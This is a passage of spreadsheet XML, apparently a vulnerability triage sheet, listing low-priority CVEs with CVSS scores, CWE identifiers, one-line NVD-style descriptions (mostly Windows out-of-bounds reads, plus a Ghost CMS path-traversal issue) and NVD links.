    </row>
    <row r="1803">
      <c r="A1803" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1803" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69453</t>
        </is>
      </c>
      <c r="C1803" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1803" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1803" s="5" t="inlineStr"/>
      <c r="F1803" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1803" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1803" s="5" t="inlineStr"/>
      <c r="I1803" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1803" s="5" t="inlineStr"/>
      <c r="K1803" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1803" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Microsoft Windows Search Component allows an authorized attacker to perform tampering locally.</t>
        </is>
      </c>
      <c r="M1803" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69453</t>
        </is>
      </c>
    </row>
    <row r="1804">
      <c r="A1804" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1804" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69457</t>
        </is>
      </c>
      <c r="C1804" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1804" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1804" s="5" t="inlineStr"/>
      <c r="F1804" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1804" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1804" s="5" t="inlineStr"/>
      <c r="I1804" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1804" s="5" t="inlineStr"/>
      <c r="K1804" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1804" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows USB Driver allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M1804" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69457</t>
        </is>
      </c>
    </row>
    <row r="1805">
      <c r="A1805" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1805" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69504</t>
        </is>
      </c>
      <c r="C1805" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1805" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1805" s="5" t="inlineStr"/>
      <c r="F1805" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1805" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1805" s="5" t="inlineStr"/>
      <c r="I1805" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1805" s="5" t="inlineStr"/>
      <c r="K1805" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1805" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows NTFS allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M1805" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69504</t>
        </is>
      </c>
    </row>
    <row r="1806">
      <c r="A1806" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1806" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69527</t>
        </is>
      </c>
      <c r="C1806" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1806" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1806" s="5" t="inlineStr"/>
      <c r="F1806" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1806" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1806" s="5" t="inlineStr"/>
      <c r="I1806" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1806" s="5" t="inlineStr"/>
      <c r="K1806" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1806" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows USB Mass Storage Class Driver allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M1806" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69527</t>
        </is>
      </c>
    </row>
    <row r="1807">
      <c r="A1807" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1807" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69531</t>
        </is>
      </c>
      <c r="C1807" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1807" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1807" s="5" t="inlineStr"/>
      <c r="F1807" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1807" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1807" s="5" t="inlineStr"/>
      <c r="I1807" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1807" s="5" t="inlineStr"/>
      <c r="K1807" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="L1807" s="5" t="inlineStr">
        <is>
          <t>Unintended proxy or intermediary ('confused deputy') in Microsoft Windows Speech allows an authorized attacker to perform tampering locally.</t>
        </is>
      </c>
      <c r="M1807" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69531</t>
        </is>
      </c>
    </row>
    <row r="1808">
      <c r="A1808" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1808" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69554</t>
        </is>
      </c>
      <c r="C1808" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1808" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1808" s="5" t="inlineStr"/>
      <c r="F1808" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1808" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1808" s="5" t="inlineStr"/>
      <c r="I1808" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1808" s="5" t="inlineStr"/>
      <c r="K1808" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L1808" s="5" t="inlineStr">
        <is>
          <t>Missing authentication for critical function in Microsoft Windows Search Component allows an authorized attacker to perform tampering locally.</t>
        </is>
      </c>
      <c r="M1808" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69554</t>
        </is>
      </c>
    </row>
    <row r="1809">
      <c r="A1809" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1809" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69568</t>
        </is>
      </c>
      <c r="C1809" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1809" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1809" s="5" t="inlineStr"/>
      <c r="F1809" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1809" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1809" s="5" t="inlineStr"/>
      <c r="I1809" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1809" s="5" t="inlineStr"/>
      <c r="K1809" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1809" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Storage Spaces Controller allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M1809" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69568</t>
        </is>
      </c>
    </row>
    <row r="1810">
      <c r="A1810" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1810" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69609</t>
        </is>
      </c>
      <c r="C1810" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1810" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1810" s="5" t="inlineStr"/>
      <c r="F1810" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1810" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1810" s="5" t="inlineStr"/>
      <c r="I1810" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1810" s="5" t="inlineStr"/>
      <c r="K1810" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-193</t>
        </is>
      </c>
      <c r="L1810" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Win32K allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M1810" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69609</t>
        </is>
      </c>
    </row>
    <row r="1811">
      <c r="A1811" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1811" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69616</t>
        </is>
      </c>
      <c r="C1811" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1811" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1811" s="5" t="inlineStr"/>
      <c r="F1811" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1811" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1811" s="5" t="inlineStr"/>
      <c r="I1811" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1811" s="5" t="inlineStr"/>
      <c r="K1811" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1811" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Remote Desktop Services allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M1811" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69616</t>
        </is>
      </c>
    </row>
    <row r="1812">
      <c r="A1812" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1812" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69618</t>
        </is>
      </c>
      <c r="C1812" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1812" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1812" s="5" t="inlineStr"/>
      <c r="F1812" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1812" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1812" s="5" t="inlineStr"/>
      <c r="I1812" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1812" s="5" t="inlineStr"/>
      <c r="K1812" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1812" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows SMB Client allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M1812" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69618</t>
        </is>
      </c>
    </row>
    <row r="1813">
      <c r="A1813" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1813" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69627</t>
        </is>
      </c>
      <c r="C1813" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1813" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1813" s="5" t="inlineStr"/>
      <c r="F1813" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1813" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1813" s="5" t="inlineStr"/>
      <c r="I1813" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1813" s="5" t="inlineStr"/>
      <c r="K1813" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1813" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Remote Desktop Licensing Service allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M1813" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69627</t>
        </is>
      </c>
    </row>
    <row r="1814">
      <c r="A1814" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1814" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69672</t>
        </is>
      </c>
      <c r="C1814" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1814" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1814" s="5" t="inlineStr"/>
      <c r="F1814" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1814" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1814" s="5" t="inlineStr"/>
      <c r="I1814" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1814" s="5" t="inlineStr"/>
      <c r="K1814" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="L1814" s="5" t="inlineStr">
        <is>
          <t>Use of uninitialized resource in Windows DNS allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M1814" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69672</t>
        </is>
      </c>
    </row>
    <row r="1815">
      <c r="A1815" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1815" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69674</t>
        </is>
      </c>
      <c r="C1815" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1815" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1815" s="5" t="inlineStr"/>
      <c r="F1815" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1815" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1815" s="5" t="inlineStr"/>
      <c r="I1815" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1815" s="5" t="inlineStr"/>
      <c r="K1815" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L1815" s="5" t="inlineStr">
        <is>
          <t>Missing authentication for critical function in Windows Modern Device Management (MDM) allows an authorized attacker to bypass a security feature locally.</t>
        </is>
      </c>
      <c r="M1815" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69674</t>
        </is>
      </c>
    </row>
    <row r="1816">
      <c r="A1816" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1816" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69684</t>
        </is>
      </c>
      <c r="C1816" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1816" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1816" s="5" t="inlineStr"/>
      <c r="F1816" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1816" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1816" s="5" t="inlineStr"/>
      <c r="I1816" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1816" s="5" t="inlineStr"/>
      <c r="K1816" s="5" t="inlineStr">
        <is>
          <t>CWE-209</t>
        </is>
      </c>
      <c r="L1816" s="5" t="inlineStr">
        <is>
          <t>Generation of error message containing sensitive information in Windows Error Reporting allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M1816" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69684</t>
        </is>
      </c>
    </row>
    <row r="1817">
      <c r="A1817" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1817" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69741</t>
        </is>
      </c>
      <c r="C1817" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1817" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1817" s="5" t="inlineStr"/>
      <c r="F1817" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1817" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1817" s="5" t="inlineStr"/>
      <c r="I1817" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1817" s="5" t="inlineStr"/>
      <c r="K1817" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1817" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Spaceport.sys allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M1817" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69741</t>
        </is>
      </c>
    </row>
    <row r="1818">
      <c r="A1818" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1818" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69770</t>
        </is>
      </c>
      <c r="C1818" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1818" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1818" s="5" t="inlineStr"/>
      <c r="F1818" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1818" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1818" s="5" t="inlineStr"/>
      <c r="I1818" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1818" s="5" t="inlineStr"/>
      <c r="K1818" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="L1818" s="5" t="inlineStr">
        <is>
          <t>Use of uninitialized resource in Windows Spaceport.sys allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M1818" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69770</t>
        </is>
      </c>
    </row>
    <row r="1819">
      <c r="A1819" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1819" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69794</t>
        </is>
      </c>
      <c r="C1819" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1819" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1819" s="5" t="inlineStr"/>
      <c r="F1819" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1819" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1819" s="5" t="inlineStr"/>
      <c r="I1819" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1819" s="5" t="inlineStr"/>
      <c r="K1819" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="L1819" s="5" t="inlineStr">
        <is>
          <t>Buffer over-read in Windows Encrypting File System (EFS) allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M1819" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69794</t>
        </is>
      </c>
    </row>
    <row r="1820">
      <c r="A1820" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1820" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69808</t>
        </is>
      </c>
      <c r="C1820" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1820" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1820" s="5" t="inlineStr"/>
      <c r="F1820" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1820" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1820" s="5" t="inlineStr"/>
      <c r="I1820" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1820" s="5" t="inlineStr"/>
      <c r="K1820" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1820" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Win32K allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M1820" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69808</t>
        </is>
      </c>
    </row>
    <row r="1821">
      <c r="A1821" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1821" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69862</t>
        </is>
      </c>
      <c r="C1821" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1821" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1821" s="5" t="inlineStr"/>
      <c r="F1821" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1821" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1821" s="5" t="inlineStr"/>
      <c r="I1821" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1821" s="5" t="inlineStr"/>
      <c r="K1821" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-200</t>
        </is>
      </c>
      <c r="L1821" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Wireless Wide Area Network Service allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M1821" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69862</t>
        </is>
      </c>
    </row>
    <row r="1822">
      <c r="A1822" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1822" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70145</t>
        </is>
      </c>
      <c r="C1822" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1822" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1822" s="5" t="inlineStr"/>
      <c r="F1822" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1822" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1822" s="5" t="inlineStr"/>
      <c r="I1822" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1822" s="5" t="inlineStr"/>
      <c r="K1822" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1822" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Windows Search Component allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M1822" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70145</t>
        </is>
      </c>
    </row>
    <row r="1823">
      <c r="A1823" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1823" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70290</t>
        </is>
      </c>
      <c r="C1823" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1823" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1823" s="5" t="inlineStr"/>
      <c r="F1823" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1823" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1823" s="5" t="inlineStr"/>
      <c r="I1823" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1823" s="5" t="inlineStr"/>
      <c r="K1823" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="L1823" s="5" t="inlineStr">
        <is>
          <t>Use of uninitialized resource in Windows Win32 Kernel Subsystem allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M1823" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70290</t>
        </is>
      </c>
    </row>
    <row r="1824">
      <c r="A1824" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1824" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70592</t>
        </is>
      </c>
      <c r="C1824" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1824" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1824" s="5" t="inlineStr"/>
      <c r="F1824" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1824" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H1824" s="5" t="inlineStr"/>
      <c r="I1824" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J1824" s="5" t="inlineStr"/>
      <c r="K1824" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1824" s="5" t="inlineStr">
        <is>
          <t>Ghost is a Node.js content management system. From 1.20.1 until 6.54.1, an Administrator-level user could remotely overwrite certain files on the filesystem through the database backup filename, leading to integrity and availability issues. The database export endpoint failed to reject path separators in the caller-supplied filename. This issue is fixed in version 6.54.1.</t>
        </is>
      </c>
      <c r="M1824" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70592</t>
        </is>
      </c>
    </row>
    <row r="1825">
      <c r="A1825" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1825" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71341</t>
        </is>
      </c>
      <c r="C1825" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1825" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1825" s="5" t="inlineStr"/>
      <c r="F1825" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1825" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1825" s="5" t="inlineStr"/>
      <c r="I1825" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1825" s="5" t="inlineStr"/>
      <c r="K1825" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1825" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Partition Management Driver allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M1825" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71341</t>
        </is>
      </c>
    </row>
    <row r="1826">
      <c r="A1826" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1826" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71441</t>
        </is>
      </c>
      <c r="C1826" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1826" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1826" s="5" t="inlineStr"/>
      <c r="F1826" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1826" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1826" s="5" t="inlineStr">
        <is>
          <t>adobe:illustrator, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I1826" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J1826" s="5" t="inlineStr"/>
      <c r="K1826" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1826" s="5" t="inlineStr">
        <is>
          <t>Illustrator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1826" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71441</t>
        </is>
      </c>
    </row>
